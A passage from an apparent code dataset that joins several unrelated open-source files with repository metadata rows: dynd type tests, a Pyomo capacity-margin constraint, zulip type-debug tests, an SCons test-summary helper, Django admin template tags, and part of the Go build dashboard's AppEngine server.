def test_fixed_string_type_properties(self):
d = ndt.make_fixed_string(10, 'ascii')
self.assertEqual(str(d), "fixed_string[10, 'ascii']")
self.assertEqual(d.data_size, 10)
self.assertEqual(d.data_alignment, 1)
# self.assertEqual(d.encoding, 'ascii')
d = ndt.make_fixed_string(10, 'ucs2')
self.assertEqual(str(d), "fixed_string[10, 'ucs2']")
self.assertEqual(d.data_size, 20)
self.assertEqual(d.data_alignment, 2)
# self.assertEqual(d.encoding, 'ucs2')
d = ndt.make_fixed_string(10, 'utf8')
self.assertEqual(str(d), 'fixed_string[10]')
self.assertEqual(d.data_size, 10)
self.assertEqual(d.data_alignment, 1)
# self.assertEqual(d.encoding, 'utf8')
d = ndt.make_fixed_string(10, 'utf16')
self.assertEqual(str(d), "fixed_string[10, 'utf16']")
self.assertEqual(d.data_size, 20)
self.assertEqual(d.data_alignment, 2)
# self.assertEqual(d.encoding, 'utf16')
d = ndt.make_fixed_string(10, 'utf32')
self.assertEqual(str(d), "fixed_string[10, 'utf32']")
self.assertEqual(d.data_size, 40)
self.assertEqual(d.data_alignment, 4)
# self.assertEqual(d.encoding, 'utf32')
def test_scalar_types(self):
self.assertEqual(ndt.bool, ndt.type(bool))
self.assertEqual(ndt.int32, ndt.type(int))
self.assertEqual(ndt.float64, ndt.type(float))
self.assertEqual(ndt.complex_float64, ndt.type(complex))
self.assertEqual(ndt.string, ndt.type(str))
self.assertEqual(ndt.bytes, ndt.type(bytearray))
if sys.version_info[0] == 2:
self.assertEqual(ndt.string, ndt.type(unicode))
if sys.version_info[0] >= 3:
self.assertEqual(ndt.bytes, ndt.type(bytes))
def test_fixed_bytes_type(self):
d = ndt.make_fixed_bytes(4, 4)
self.assertEqual(str(d), 'fixed_bytes[4, align=4]')
self.assertEqual(d.data_size, 4)
self.assertEqual(d.data_alignment, 4)
d = ndt.make_fixed_bytes(9, 1)
self.assertEqual(str(d), 'fixed_bytes[9]')
self.assertEqual(d.data_size, 9)
self.assertEqual(d.data_alignment, 1)
# Alignment must not be greater than data_size
self.assertRaises(RuntimeError, ndt.make_fixed_bytes, 1, 2)
# Alignment must be a power of 2
self.assertRaises(RuntimeError, ndt.make_fixed_bytes, 6, 3)
# Alignment must divide into the data_size
self.assertRaises(RuntimeError, ndt.make_fixed_bytes, 6, 4)
def test_cstruct_type(self):
self.assertFalse(ndt.type('{x: int32}') == ndt.type('{y: int32}'))
def test_callable_type(self):
tp = ndt.callable(ndt.int32, ndt.float64)
def test_struct_type(self):
tp = ndt.make_struct([ndt.int32, ndt.int64], ['x', 'y'])
self.assertTrue(tp.field_types, [ndt.int32, ndt.int64])
self.assertTrue(tp.field_names, ['x', 'y'])
self.assertEqual(tp.arrmeta_size, 2 * ctypes.sizeof(ctypes.c_void_p))
self.assertTrue(tp.data_size is None)
def test_tuple_type(self):
tp = ndt.type('(int32, int64)')
self.assertTrue(tp.field_types, [ndt.int32, ndt.int64])
self.assertEqual(tp.arrmeta_size, 2 * ctypes.sizeof(ctypes.c_void_p))
self.assertTrue(tp.data_size is None)
def test_type_shape(self):
# The shape attribute of ndt.type
tp = ndt.type('3 * 4 * int32')
self.assertEqual(tp.shape, (3, 4))
tp = ndt.type('Fixed * 3 * var * int32')
self.assertEqual(tp.shape, (-1, 3, -1))
tp = ndt.type('var * 3 * 2 * int32')
self.assertEqual(tp.shape, (-1, 3, 2))
if __name__ == '__main__':
unittest.main(verbosity=2)
| bsd-2-clause | -8,403,474,971,097,990,000 | 39.350711 | 79 | 0.633192 | false |
OCM-Lab-PUC/switch-chile | switch_mod/Chile/capacity_margin.py | 1 | 1848 | from pyomo.environ import *
def define_components(mod):
"""
Add the planning reserve factor for capacity
This is just a translation of the AMPL code.
I assume there are no storage projects and that
flexible baseload plants are dispatchable.
TODO:
-Test this.
-Add a loading module for the capacity_reserve_margin parameter
-There is a bug: new projects rise errors because they are not defined in early tps
"""
mod.capacity_reserve_margin = Param(within = NonNegativeReals, default = 0.15)
mod.Capacity_Reserves = Constraint(
mod.LOAD_ZONES,
mod.TIMEPOINTS,
rule = lambda m, lz, t: (
m.lz_demand_mw[lz, t] * (1 + m.capacity_reserve_margin) * (1 + m.distribution_loss_rate)
<=
sum(m.ProjCapacityTP[proj, t] * m.proj_max_capacity_factor[proj, t]
for proj in m.VARIABLE_PROJECTS if m.proj_load_zone[proj] == lz
and (proj, m.tp_period[t]) in m.PROJECT_OPERATIONAL_PERIODS) +
sum(m.ProjCapacityTP[proj, t] * (1 - m.proj_scheduled_outage_rate[proj])
for proj in m.BASELOAD_PROJECTS if m.proj_load_zone[proj] == lz
and (proj, m.tp_period[t]) in m.PROJECT_OPERATIONAL_PERIODS) +
sum(m.ProjCapacityTP[proj, t]
for proj in m.DISPATCHABLE_PROJECTS if m.proj_load_zone[proj] == lz
and (proj, m.tp_period[t]) in m.PROJECT_OPERATIONAL_PERIODS) +
sum(m.TxPowerReceived[lz_from, lz_to, tp]
for (lz_from, lz_to, tp) in m.TRANS_TIMEPOINTS
if lz_to == lz and tp == t) -
sum(m.TxPowerSent[lz_from, lz_to, tp]
for (lz_from, lz_to, tp) in m.TRANS_TIMEPOINTS
if lz_from == lz and tp == t)
)) | apache-2.0 | 2,931,847,859,504,690,000 | 44.25 | 100 | 0.579545 | false |
niftynei/zulip | zerver/tests/test_type_debug.py | 15 | 5086 | from __future__ import print_function
import sys
from unittest import TestCase
from six.moves import cStringIO as StringIO
from zerver.lib.type_debug import print_types
from typing import Any, Callable, Dict, Iterable, Tuple, TypeVar
T = TypeVar('T')
def add(x=0, y=0):
# type: (Any, Any) -> Any
return x + y
def to_dict(l=[]):
# type: (Iterable[Tuple[Any, Any]]) -> Dict[Any, Any]
return dict(l)
class TypesPrintTest(TestCase):
# These 2 methods are needed to run tests with our custom test-runner
def _pre_setup(self):
# type: () -> None
pass
def _post_teardown(self):
# type: () -> None
pass
def check_signature(self, signature, retval, func, *args, **kwargs):
# type: (str, T, Callable[..., T], *Any, **Any) -> None
"""
Checks if print_types outputs `signature` when func is called with *args and **kwargs.
Do not decorate func with print_types before passing into this function.
func will be decorated with print_types within this function.
"""
try:
original_stdout = sys.stdout
sys.stdout = StringIO()
self.assertEqual(retval, print_types(func)(*args, **kwargs))
self.assertEqual(sys.stdout.getvalue().strip(), signature)
finally:
sys.stdout = original_stdout
def test_empty(self):
# type: () -> None
def empty_func():
# type: () -> None
pass
self.check_signature("empty_func() -> None", None, empty_func) # type: ignore # https://github.com/python/mypy/issues/1932
self.check_signature("<lambda>() -> None", None, (lambda: None)) # type: ignore # https://github.com/python/mypy/issues/1932
def test_basic(self):
# type: () -> None
self.check_signature("add(float, int) -> float",
5.0, add, 2.0, 3)
self.check_signature("add(float, y=int) -> float",
5.0, add, 2.0, y=3)
self.check_signature("add(x=int) -> int", 2, add, x=2)
self.check_signature("add() -> int", 0, add)
def test_list(self):
# type: () -> None
self.check_signature("add([], [str]) -> [str]",
['two'], add, [], ['two'])
self.check_signature("add([int], [str]) -> [int, ...]",
[2, 'two'], add, [2], ['two'])
self.check_signature("add([int, ...], y=[]) -> [int, ...]",
[2, 'two'], add, [2, 'two'], y=[])
def test_dict(self):
# type: () -> None
self.check_signature("to_dict() -> {}", {}, to_dict)
self.check_signature("to_dict([(int, str)]) -> {int: str}",
{2: 'two'}, to_dict, [(2, 'two')])
self.check_signature("to_dict(((int, str),)) -> {int: str}",
{2: 'two'}, to_dict, ((2, 'two'),))
self.check_signature("to_dict([(int, str), ...]) -> {int: str, ...}",
{1: 'one', 2: 'two'}, to_dict, [(1, 'one'), (2, 'two')])
def test_tuple(self):
# type: () -> None
self.check_signature("add((), ()) -> ()",
(), add, (), ())
self.check_signature("add((int,), (str,)) -> (int, str)",
(1, 'one'), add, (1,), ('one',))
self.check_signature("add(((),), ((),)) -> ((), ())",
((), ()), add, ((),), ((),))
def test_class(self):
# type: () -> None
class A(object):
pass
class B(str):
pass
self.check_signature("<lambda>(A) -> str", 'A', (lambda x: x.__class__.__name__), A())
self.check_signature("<lambda>(B) -> int", 5, (lambda x: len(x)), B("hello"))
def test_sequence(self):
# type: () -> None
class A(list):
pass
class B(list):
pass
self.check_signature("add(A([]), B([str])) -> [str]",
['two'], add, A([]), B(['two']))
self.check_signature("add(A([int]), B([str])) -> [int, ...]",
[2, 'two'], add, A([2]), B(['two']))
self.check_signature("add(A([int, ...]), y=B([])) -> [int, ...]",
[2, 'two'], add, A([2, 'two']), y=B([]))
def test_mapping(self):
# type: () -> None
class A(dict):
pass
def to_A(l=[]):
# type: (Iterable[Tuple[Any, Any]]) -> A
return A(l)
self.check_signature("to_A() -> A([])", A(()), to_A)
self.check_signature("to_A([(int, str)]) -> A([(int, str)])",
{2: 'two'}, to_A, [(2, 'two')])
self.check_signature("to_A([(int, str), ...]) -> A([(int, str), ...])",
{1: 'one', 2: 'two'}, to_A, [(1, 'one'), (2, 'two')])
self.check_signature("to_A(((int, str), (int, str))) -> A([(int, str), ...])",
{1: 'one', 2: 'two'}, to_A, ((1, 'one'), (2, 'two')))
| apache-2.0 | -1,924,752,163,495,212,000 | 37.240602 | 132 | 0.451435 | false |
WellDone/pymomo | pymomo/config/site_scons/test_summary.py | 2 | 1801 | import os.path
def build_summary_cmd(target, source, env):
"""
Build a text file with the status results for all of the unit tests in sources.
sources should point to an array of strings corresponding to .status files.
"""
some_failed = False
targets = {}
for node in source:
path = str(node)
name, targ, ext = parse_name(path)
if ext != '.status':
print "Ignoring non-status file %s, this file should not be in this list" % path
if targ not in targets:
targets[targ] = []
targets[targ].append((name, path))
with open(str(target[0]), 'w') as f:
f.write('Test Summary\n')
for targ, tests in targets.iteritems():
num_tests = len(tests)
results = map(lambda x: test_passed(x[1]), tests)
tagged_tests = zip(tests, results)
failed = filter(lambda x: x[1] == False, tagged_tests)
passed = filter(lambda x: x[1] == True, tagged_tests)
num_passed = len(passed)
if num_passed != num_tests:
some_failed = True
f.write("\n## Target %s ##\n" % targ)
f.write("%d/%d tests passed (%d%% pass rate)\n" % (num_passed, num_tests, (num_passed*100/num_tests)))
for fail in failed:
f.write("Test %s FAILED\n" % fail[0][0])
with open(str(target[0]), "r") as f:
for line in f.readlines():
print line.rstrip()
#Raise a build error if some tests failed
if some_failed:
return 1
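# Illustrative sketch of the conventions assumed above (file names are
# hypothetical): each unit test produces a file named '<test>@<target>.status'
# whose entire contents are either 'PASSED' or 'FAILED'.
#
#   >>> parse_name('build/test/blink@lpc1347.status')
#   ('blink', 'lpc1347', '.status')
#
# test_passed() maps the file contents to True/False and raises ValueError on
# anything else.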
def test_passed(path):
with open(path, 'r') as f:
contents = f.read()
result = contents.lstrip().rstrip()
if result == 'PASSED':
return True
elif result == 'FAILED':
return False
else:
raise ValueError('Invalid value in test status file %s, contents were %s' %(path, result))
def parse_name(path):
base = os.path.basename(path)
(name, ext) = os.path.splitext(base)
(name, target) = name.split('@', 1)
return (name, target, ext) | lgpl-3.0 | 3,122,456,705,946,558,500 | 23.684932 | 105 | 0.646863 | false |
toomoresuch/pysonengine | parts/google_appengine/lib/django/django/contrib/admin/templatetags/admin_modify.py | 32 | 10224 | from django import template
from django.contrib.admin.views.main import AdminBoundField
from django.template import loader
from django.utils.text import capfirst
from django.db import models
from django.db.models.fields import Field
from django.db.models.related import BoundRelatedObject
from django.conf import settings
import re
register = template.Library()
word_re = re.compile('[A-Z][a-z]+')
absolute_url_re = re.compile(r'^(?:http(?:s)?:/)?/', re.IGNORECASE)
def class_name_to_underscored(name):
return '_'.join([s.lower() for s in word_re.findall(name)[:-1]])
def include_admin_script(script_path):
"""
Returns an HTML script element for including a script from the admin
media url (or other location if an absolute url is given).
Example usage::
{% include_admin_script "js/calendar.js" %}
could return::
<script type="text/javascript" src="/media/admin/js/calendar.js">
"""
if not absolute_url_re.match(script_path):
script_path = '%s%s' % (settings.ADMIN_MEDIA_PREFIX, script_path)
return '<script type="text/javascript" src="%s"></script>' % script_path
include_admin_script = register.simple_tag(include_admin_script)
def submit_row(context):
opts = context['opts']
change = context['change']
is_popup = context['is_popup']
return {
'onclick_attrib': (opts.get_ordered_objects() and change
and 'onclick="submitOrderForm();"' or ''),
'show_delete_link': (not is_popup and context['has_delete_permission']
and (change or context['show_delete'])),
'show_save_as_new': not is_popup and change and opts.admin.save_as,
'show_save_and_add_another': not is_popup and (not opts.admin.save_as or context['add']),
'show_save_and_continue': not is_popup and context['has_change_permission'],
'show_save': True
}
submit_row = register.inclusion_tag('admin/submit_line.html', takes_context=True)(submit_row)
def field_label(bound_field):
class_names = []
if isinstance(bound_field.field, models.BooleanField):
class_names.append("vCheckboxLabel")
colon = ""
else:
if not bound_field.field.blank:
class_names.append('required')
if not bound_field.first:
class_names.append('inline')
colon = ":"
class_str = class_names and ' class="%s"' % ' '.join(class_names) or ''
return '<label for="%s"%s>%s%s</label> ' % (bound_field.element_id, class_str, \
capfirst(bound_field.field.verbose_name), colon)
field_label = register.simple_tag(field_label)
class FieldWidgetNode(template.Node):
nodelists = {}
default = None
def __init__(self, bound_field_var):
self.bound_field_var = bound_field_var
def get_nodelist(cls, klass):
if not cls.nodelists.has_key(klass):
try:
field_class_name = klass.__name__
template_name = "widget/%s.html" % class_name_to_underscored(field_class_name)
nodelist = loader.get_template(template_name).nodelist
except template.TemplateDoesNotExist:
super_klass = bool(klass.__bases__) and klass.__bases__[0] or None
if super_klass and super_klass != Field:
nodelist = cls.get_nodelist(super_klass)
else:
if not cls.default:
cls.default = loader.get_template("widget/default.html").nodelist
nodelist = cls.default
cls.nodelists[klass] = nodelist
return nodelist
else:
return cls.nodelists[klass]
get_nodelist = classmethod(get_nodelist)
def render(self, context):
bound_field = template.resolve_variable(self.bound_field_var, context)
context.push()
context['bound_field'] = bound_field
output = self.get_nodelist(bound_field.field.__class__).render(context)
context.pop()
return output
class FieldWrapper(object):
def __init__(self, field ):
self.field = field
def needs_header(self):
return not isinstance(self.field, models.AutoField)
def header_class_attribute(self):
return self.field.blank and ' class="optional"' or ''
def use_raw_id_admin(self):
return isinstance(self.field.rel, (models.ManyToOneRel, models.ManyToManyRel)) \
and self.field.rel.raw_id_admin
class FormFieldCollectionWrapper(object):
def __init__(self, field_mapping, fields, index):
self.field_mapping = field_mapping
self.fields = fields
self.bound_fields = [AdminBoundField(field, self.field_mapping, field_mapping['original'])
for field in self.fields]
self.index = index
class TabularBoundRelatedObject(BoundRelatedObject):
def __init__(self, related_object, field_mapping, original):
super(TabularBoundRelatedObject, self).__init__(related_object, field_mapping, original)
self.field_wrapper_list = [FieldWrapper(field) for field in self.relation.editable_fields()]
fields = self.relation.editable_fields()
self.form_field_collection_wrappers = [FormFieldCollectionWrapper(field_mapping, fields, i)
for (i,field_mapping) in self.field_mappings.items() ]
self.original_row_needed = max([fw.use_raw_id_admin() for fw in self.field_wrapper_list])
self.show_url = original and hasattr(self.relation.opts, 'get_absolute_url')
def template_name(self):
return "admin/edit_inline_tabular.html"
class StackedBoundRelatedObject(BoundRelatedObject):
def __init__(self, related_object, field_mapping, original):
super(StackedBoundRelatedObject, self).__init__(related_object, field_mapping, original)
fields = self.relation.editable_fields()
self.field_mappings.fill()
self.form_field_collection_wrappers = [FormFieldCollectionWrapper(field_mapping ,fields, i)
for (i,field_mapping) in self.field_mappings.items()]
self.show_url = original and hasattr(self.relation.opts, 'get_absolute_url')
def template_name(self):
return "admin/edit_inline_stacked.html"
class EditInlineNode(template.Node):
def __init__(self, rel_var):
self.rel_var = rel_var
def render(self, context):
relation = template.resolve_variable(self.rel_var, context)
context.push()
if relation.field.rel.edit_inline == models.TABULAR:
bound_related_object_class = TabularBoundRelatedObject
elif relation.field.rel.edit_inline == models.STACKED:
bound_related_object_class = StackedBoundRelatedObject
else:
bound_related_object_class = relation.field.rel.edit_inline
original = context.get('original', None)
bound_related_object = relation.bind(context['form'], original, bound_related_object_class)
context['bound_related_object'] = bound_related_object
t = loader.get_template(bound_related_object.template_name())
output = t.render(context)
context.pop()
return output
def output_all(form_fields):
return ''.join([str(f) for f in form_fields])
output_all = register.simple_tag(output_all)
def auto_populated_field_script(auto_pop_fields, change = False):
t = []
for field in auto_pop_fields:
if change:
t.append('document.getElementById("id_%s")._changed = true;' % field.name)
else:
t.append('document.getElementById("id_%s").onchange = function() { this._changed = true; };' % field.name)
add_values = ' + " " + '.join(['document.getElementById("id_%s").value' % g for g in field.prepopulate_from])
for f in field.prepopulate_from:
t.append('document.getElementById("id_%s").onkeyup = function() {' \
' var e = document.getElementById("id_%s");' \
' if(!e._changed) { e.value = URLify(%s, %s);} }; ' % (
f, field.name, add_values, field.maxlength))
return ''.join(t)
auto_populated_field_script = register.simple_tag(auto_populated_field_script)
def filter_interface_script_maybe(bound_field):
f = bound_field.field
if f.rel and isinstance(f.rel, models.ManyToManyRel) and f.rel.filter_interface:
return '<script type="text/javascript">addEvent(window, "load", function(e) {' \
' SelectFilter.init("id_%s", "%s", %s, "%s"); });</script>\n' % (
f.name, f.verbose_name.replace('"', '\\"'), f.rel.filter_interface-1, settings.ADMIN_MEDIA_PREFIX)
else:
return ''
filter_interface_script_maybe = register.simple_tag(filter_interface_script_maybe)
def field_widget(parser, token):
bits = token.contents.split()
if len(bits) != 2:
raise template.TemplateSyntaxError, "%s takes 1 argument" % bits[0]
return FieldWidgetNode(bits[1])
field_widget = register.tag(field_widget)
def edit_inline(parser, token):
bits = token.contents.split()
if len(bits) != 2:
raise template.TemplateSyntaxError, "%s takes 1 argument" % bits[0]
return EditInlineNode(bits[1])
edit_inline = register.tag(edit_inline)
def admin_field_line(context, argument_val):
if isinstance(argument_val, AdminBoundField):
bound_fields = [argument_val]
else:
bound_fields = [bf for bf in argument_val]
add = context['add']
change = context['change']
class_names = ['form-row']
for bound_field in bound_fields:
for f in bound_field.form_fields:
if f.errors():
class_names.append('errors')
break
# Assumes BooleanFields won't be stacked next to each other!
if isinstance(bound_fields[0].field, models.BooleanField):
class_names.append('checkbox-row')
return {
'add': context['add'],
'change': context['change'],
'bound_fields': bound_fields,
'class_names': " ".join(class_names),
}
admin_field_line = register.inclusion_tag('admin/field_line.html', takes_context=True)(admin_field_line)
| mit | 2,964,084,063,973,223,000 | 40.392713 | 118 | 0.634781 | false |
ssrl/go | misc/dashboard/godashboard/gobuild.py | 3 | 17794 | # Copyright 2009 The Go Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
# This is the server part of the continuous build system for Go. It must be run
# by AppEngine.
from django.utils import simplejson
from google.appengine.api import mail
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
import datetime
import hashlib
import logging
import os
import re
import bz2
# local imports
from auth import auth
import const
# The majority of our state is stored in Commit objects. One of these exists for
# each of the commits known to the build system. Their key names are of the form
# <commit number (%08x)> "-" <hg hash>. This means that sorting by key name is
# sufficient to order the commits.
#
# The commit numbers are purely local. They need not match up to the commit
# numbers in an hg repo. When inserting a new commit, the parent commit must be
# given and this is used to generate the new commit number. In order to create
# the first Commit object, a special command (/init) is used.
class Commit(db.Model):
num = db.IntegerProperty() # internal, monotonic counter.
node = db.StringProperty() # Hg hash
parentnode = db.StringProperty() # Hg hash
user = db.StringProperty()
date = db.DateTimeProperty()
desc = db.BlobProperty()
# This is the list of builds. Each element is a string of the form <builder
# name> '`' <log hash>. If the log hash is empty, then the build was
# successful.
builds = db.StringListProperty()
fail_notification_sent = db.BooleanProperty()
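# Illustrative sketch (not part of the original source) of how a Commit key
# name is built from its number and hg hash; the hash below is a made-up value.
#
#   key_name = '%08x-%s' % (1234, 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3')
#   # -> '000004d2-a94a8fe5ccb19ba61c4c0873d391e987982fbbd3'
#
# Because the number is zero-padded to 8 hex digits, sorting key names as
# strings (as q.order('-__key__') does below) orders commits by their number.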
# A CompressedLog contains the textual build log of a failed build.
# The key name is the hex digest of the SHA256 hash of the contents.
# The contents is bz2 compressed.
class CompressedLog(db.Model):
log = db.BlobProperty()
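# Illustrative sketch, mirroring how Build.post stores logs further below: the
# key name is the SHA256 hex digest of the raw log text and the stored blob is
# bz2-compressed.
#
#   loghash = hashlib.sha256(log_text).hexdigest()
#   CompressedLog(key_name=loghash, log=bz2.compress(log_text)).put()
#   # retrieval, as done by LogHandler:
#   log_text = bz2.decompress(CompressedLog.get_by_key_name(loghash).log)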
N = 30
def builderInfo(b):
f = b.split('-', 3)
goos = f[0]
goarch = f[1]
note = ""
if len(f) > 2:
note = f[2]
return {'name': b, 'goos': goos, 'goarch': goarch, 'note': note}
def builderset():
q = Commit.all()
q.order('-__key__')
results = q.fetch(N)
builders = set()
for c in results:
builders.update(set(parseBuild(build)['builder'] for build in c.builds))
return builders
class MainPage(webapp.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/html; charset=utf-8'
try:
page = int(self.request.get('p', 1))
if not page > 0:
raise
except:
page = 1
try:
num = int(self.request.get('n', N))
if num <= 0 or num > 200:
raise
except:
num = N
offset = (page-1) * num
q = Commit.all()
q.order('-__key__')
results = q.fetch(num, offset)
revs = [toRev(r) for r in results]
builders = {}
for r in revs:
for b in r['builds']:
builders[b['builder']] = builderInfo(b['builder'])
for r in revs:
have = set(x['builder'] for x in r['builds'])
need = set(builders.keys()).difference(have)
for n in need:
r['builds'].append({'builder': n, 'log':'', 'ok': False})
r['builds'].sort(cmp = byBuilder)
builders = list(builders.items())
builders.sort()
values = {"revs": revs, "builders": [v for k,v in builders]}
values['num'] = num
values['prev'] = page - 1
if len(results) == num:
values['next'] = page + 1
path = os.path.join(os.path.dirname(__file__), 'main.html')
self.response.out.write(template.render(path, values))
# A DashboardHandler is a webapp.RequestHandler but provides
# authenticated_post - called by post after authenticating
# json - writes object in json format to response output
class DashboardHandler(webapp.RequestHandler):
def post(self):
if not auth(self.request):
self.response.set_status(403)
return
self.authenticated_post()
def authenticated_post(self):
return
def json(self, obj):
self.response.set_status(200)
simplejson.dump(obj, self.response.out)
return
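# Minimal usage sketch (hypothetical handler, not in the original code): a
# subclass only implements authenticated_post(); DashboardHandler.post() takes
# care of the auth check and json() writes the response.
#
#   class PingHandler(DashboardHandler):
#       def authenticated_post(self):
#           self.json({'Status': 'OK'})
#
# Such a handler would still need to be registered in the URL map at the
# bottom of this file.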
# Todo serves /todo. It tells the builder which commits need to be built.
class Todo(DashboardHandler):
def get(self):
builder = self.request.get('builder')
key = 'todo-%s' % builder
response = memcache.get(key)
if response is None:
# Fell out of memcache. Rebuild from datastore results.
# We walk the commit list looking for nodes that have not
# been built by this builder.
q = Commit.all()
q.order('-__key__')
todo = []
first = None
for c in q.fetch(N+1):
if first is None:
first = c
if not built(c, builder):
todo.append({'Hash': c.node})
response = simplejson.dumps(todo)
memcache.set(key, response, 3600)
self.response.set_status(200)
self.response.out.write(response)
def built(c, builder):
for b in c.builds:
if b.startswith(builder+'`'):
return True
return False
# Log serves /log/. It retrieves log data by content hash.
class LogHandler(DashboardHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'
hash = self.request.path[5:]
l = CompressedLog.get_by_key_name(hash)
if l is None:
self.response.set_status(404)
return
log = bz2.decompress(l.log)
self.response.set_status(200)
self.response.out.write(log)
# Init creates the commit with id 0. Since this commit doesn't have a parent,
# it cannot be created by Build.
class Init(DashboardHandler):
def authenticated_post(self):
date = parseDate(self.request.get('date'))
node = self.request.get('node')
if not validNode(node) or date is None:
logging.error("Not valid node ('%s') or bad date (%s %s)", node, date, self.request.get('date'))
self.response.set_status(500)
return
commit = Commit(key_name = '00000000-%s' % node)
commit.num = 0
commit.node = node
commit.parentnode = ''
commit.user = self.request.get('user').encode('utf8')
commit.date = date
commit.desc = self.request.get('desc').encode('utf8')
commit.put()
self.response.set_status(200)
# The last commit when we switched to using entity groups.
# This is the root of the new commit entity group.
RootCommitKeyName = '00000f26-f32c6f1038207c55d5780231f7484f311020747e'
# CommitHandler serves /commit.
# A GET of /commit retrieves information about the specified commit.
# A POST of /commit creates a node for the given commit.
# If the commit already exists, the POST silently succeeds (like mkdir -p).
class CommitHandler(DashboardHandler):
def get(self):
node = self.request.get('node')
if not validNode(node):
return self.json({'Status': 'FAIL', 'Error': 'malformed node hash'})
n = nodeByHash(node)
if n is None:
return self.json({'Status': 'FAIL', 'Error': 'unknown revision'})
return self.json({'Status': 'OK', 'Node': nodeObj(n)})
def authenticated_post(self):
# Require auth with the master key, not a per-builder key.
if self.request.get('builder'):
self.response.set_status(403)
return
node = self.request.get('node')
date = parseDate(self.request.get('date'))
user = self.request.get('user').encode('utf8')
desc = self.request.get('desc').encode('utf8')
parenthash = self.request.get('parent')
if not validNode(node) or not validNode(parenthash) or date is None:
return self.json({'Status': 'FAIL', 'Error': 'malformed node, parent, or date'})
n = nodeByHash(node)
if n is None:
p = nodeByHash(parenthash)
if p is None:
return self.json({'Status': 'FAIL', 'Error': 'unknown parent'})
# Want to create new node in a transaction so that multiple
# requests creating it do not collide and so that multiple requests
# creating different nodes get different sequence numbers.
# All queries within a transaction must include an ancestor,
# but the original datastore objects we used for the dashboard
# have no common ancestor. Instead, we use a well-known
# root node - the last one before we switched to entity groups -
# as the common ancestor.
root = Commit.get_by_key_name(RootCommitKeyName)
def add_commit():
if nodeByHash(node, ancestor=root) is not None:
return
# Determine number for this commit.
# Once we have created one new entry it will be lastRooted.num+1,
# but the very first commit created in this scheme will have to use
# last.num's number instead (last is likely not rooted).
q = Commit.all()
q.order('-__key__')
q.ancestor(root)
last = q.fetch(1)[0]
num = last.num+1
n = Commit(key_name = '%08x-%s' % (num, node), parent = root)
n.num = num
n.node = node
n.parentnode = parenthash
n.user = user
n.date = date
n.desc = desc
n.put()
db.run_in_transaction(add_commit)
n = nodeByHash(node)
if n is None:
return self.json({'Status': 'FAIL', 'Error': 'failed to create commit node'})
return self.json({'Status': 'OK', 'Node': nodeObj(n)})
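# Request sketch for this handler (parameter names come from the code above;
# the hash and timestamp values would be real hg hashes and unix times):
#
#   GET  /commit?node=<40-char hg hash>
#   POST /commit  with form fields: node, parent, user, date, desc
#        (authenticated with the master key, not a per-builder key)
#
# Both respond with JSON of the form {"Status": "OK", "Node": {...}} on
# success or {"Status": "FAIL", "Error": "..."} on failure.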
# Build serves /build.
# A POST to /build records a new build result.
class Build(webapp.RequestHandler):
def post(self):
if not auth(self.request):
self.response.set_status(403)
return
builder = self.request.get('builder')
log = self.request.get('log').encode('utf-8')
loghash = ''
if len(log) > 0:
loghash = hashlib.sha256(log).hexdigest()
l = CompressedLog(key_name=loghash)
l.log = bz2.compress(log)
l.put()
node = self.request.get('node')
if not validNode(node):
logging.error('Invalid node %s' % (node))
self.response.set_status(500)
return
n = nodeByHash(node)
if n is None:
logging.error('Cannot find node %s' % (node))
self.response.set_status(404)
return
nn = n
def add_build():
n = nodeByHash(node, ancestor=nn)
if n is None:
logging.error('Cannot find hash in add_build: %s %s' % (builder, node))
return
s = '%s`%s' % (builder, loghash)
for i, b in enumerate(n.builds):
if b.split('`', 1)[0] == builder:
# logging.error('Found result for %s %s already' % (builder, node))
n.builds[i] = s
break
else:
# logging.error('Added result for %s %s' % (builder, node))
n.builds.append(s)
n.put()
db.run_in_transaction(add_build)
key = 'todo-%s' % builder
memcache.delete(key)
c = getBrokenCommit(node, builder)
if c is not None and not c.fail_notification_sent:
notifyBroken(c, builder)
self.response.set_status(200)
def getBrokenCommit(node, builder):
"""
getBrokenCommit returns a Commit that breaks the build.
The Commit will be either the one specified by node or the one after.
"""
# Squelch mail if already fixed.
head = firstResult(builder)
if broken(head, builder) == False:
return
# Get current node and node before, after.
cur = nodeByHash(node)
if cur is None:
return
before = nodeBefore(cur)
after = nodeAfter(cur)
if broken(before, builder) == False and broken(cur, builder):
return cur
if broken(cur, builder) == False and broken(after, builder):
return after
return
def firstResult(builder):
q = Commit.all().order('-__key__')
for c in q.fetch(20):
for i, b in enumerate(c.builds):
p = b.split('`', 1)
if p[0] == builder:
return c
return None
def nodeBefore(c):
return nodeByHash(c.parentnode)
def nodeAfter(c):
return Commit.all().filter('parentnode =', c.node).get()  # Commit stores its parent hash in 'parentnode'
def notifyBroken(c, builder):
def send():
n = Commit.get(c.key())
if n is None:
logging.error("couldn't retrieve Commit '%s'" % c.key())
return False
if n.fail_notification_sent:
return False
n.fail_notification_sent = True
return n.put()
if not db.run_in_transaction(send):
return
subject = const.mail_fail_subject % (builder, c.desc.split('\n')[0])
path = os.path.join(os.path.dirname(__file__), 'fail-notify.txt')
body = template.render(path, {
"builder": builder,
"node": c.node,
"user": c.user,
"desc": c.desc,
"loghash": logHash(c, builder)
})
mail.send_mail(
sender=const.mail_from,
to=const.mail_fail_to,
subject=subject,
body=body
)
def logHash(c, builder):
for i, b in enumerate(c.builds):
p = b.split('`', 1)
if p[0] == builder:
return p[1]
return ""
def broken(c, builder):
"""
broken returns True if commit c breaks the build for the specified builder,
False if it is a good build, and None if no results exist for this builder.
"""
if c is None:
return None
for i, b in enumerate(c.builds):
p = b.split('`', 1)
if p[0] == builder:
return len(p[1]) > 0
return None
def node(num):
q = Commit.all()
q.filter('num =', num)
n = q.get()
return n
def nodeByHash(hash, ancestor=None):
q = Commit.all()
q.filter('node =', hash)
if ancestor is not None:
q.ancestor(ancestor)
n = q.get()
return n
# nodeObj returns a JSON object (ready to be passed to simplejson.dump) describing node.
def nodeObj(n):
return {
'Hash': n.node,
'ParentHash': n.parentnode,
'User': n.user,
'Date': n.date.strftime('%Y-%m-%d %H:%M %z'),
'Desc': n.desc,
}
class FixedOffset(datetime.tzinfo):
"""Fixed offset in minutes east from UTC."""
def __init__(self, offset):
self.__offset = datetime.timedelta(seconds = offset)
def utcoffset(self, dt):
return self.__offset
